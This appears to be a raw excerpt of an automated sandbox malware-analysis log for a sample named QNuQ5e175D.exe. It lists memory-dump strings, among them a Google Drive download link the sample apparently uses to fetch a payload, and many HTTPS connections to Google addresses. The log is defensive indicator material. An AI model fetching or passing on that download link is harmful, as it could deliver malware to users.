      Source: QNuQ5e175D.exe, 00000003.00000003.1745863415.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1791818626.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1780110033.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1768535254.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1757399705.0000000003A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadt
      Source: QNuQ5e175D.exe, 00000003.00000003.1847687586.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1813958035.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1858349107.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1690308078.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1847731615.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1768510854.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1735078700.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1712715094.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1836340041.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1836304507.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1701291775.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1723334448.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1791237661.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1780080786.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1745810873.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1858487452.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1803358057.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1757374960.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1678008587.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1779990575.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1701334544.0000000003A81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloaduq
      Source: QNuQ5e175D.exe, 00000003.00000003.1723334448.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1745810873.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1678008587.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1628142286.0000000003A7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadvv
      Source: QNuQ5e175D.exe, 00000003.00000003.1745863415.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A43000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1791818626.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892630990.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1780110033.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1768535254.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1757399705.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1881137157.0000000003A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadw
      Source: QNuQ5e175D.exe, 00000003.00000003.1993229355.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2082212148.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2060093323.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2015717613.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2037793311.0000000003A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadx
      Source: QNuQ5e175D.exe, 00000003.00000003.2457226025.0000000003A79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloady
      Source: QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A61000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1628142286.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2037793311.0000000003A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: QNuQ5e175D.exe, 00000003.00000003.2434684472.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2116216201.0000000003A78000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1780080786.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2071438083.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1937717326.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1803358057.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1757374960.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000002.2562113835.0000000003AC1000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1617239451.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1779990575.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2027261178.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1592877929.0000000003A82000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1970929884.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2037793311.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1960034459.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2445603809.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2104101611.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1948458745.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892630990.0000000003A61000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1604917776.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1757332882.0000000003A79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: QNuQ5e175D.exe, 00000003.00000003.2434684472.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2116216201.0000000003A78000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1780080786.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2071438083.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1628221931.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1937717326.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1803358057.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1667217683.0000000003A74000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1757374960.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000002.2562113835.0000000003AC1000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1617239451.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1779990575.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2027261178.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1592877929.0000000003A82000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1970929884.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2037793311.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1960034459.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2445603809.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2104101611.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1948458745.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892630990.0000000003A61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: QNuQ5e175D.exe, 00000003.00000003.2434684472.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2116216201.0000000003A78000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1780080786.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2071438083.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1937717326.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1803358057.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1757374960.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000002.2562113835.0000000003AC1000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1617239451.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1779990575.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2027261178.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1592877929.0000000003A82000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1970929884.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2037793311.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1960034459.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2445603809.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2104101611.0000000003AB9000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1948458745.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892630990.0000000003A61000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1604917776.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1757332882.0000000003A79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A61000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1628142286.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2037793311.0000000003A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A61000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1628142286.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2037793311.0000000003A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A61000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1628142286.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2037793311.0000000003A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A61000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1628142286.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2037793311.0000000003A7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
      Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
      Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
      Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
      Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
      Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
      Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
      Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
      Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
      Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
      Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
      Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
      Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
      Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
      Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50065 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
      Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
      Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
      Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
      Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
      Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
      Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
      Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
      Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
      Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
      Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
      Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
      Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
      Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
      Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
      Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
      Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
      Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
      Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:49854 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.11:49860 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:49871 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:49888 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:49926 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:49943 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:49959 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:49976 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:49990 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:49999 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50001 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50004 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50006 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50008 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50012 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50014 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50016 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50018 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50020 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50022 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50024 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50026 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50034 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50036 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50038 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50042 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50044 version: TLS 1.2
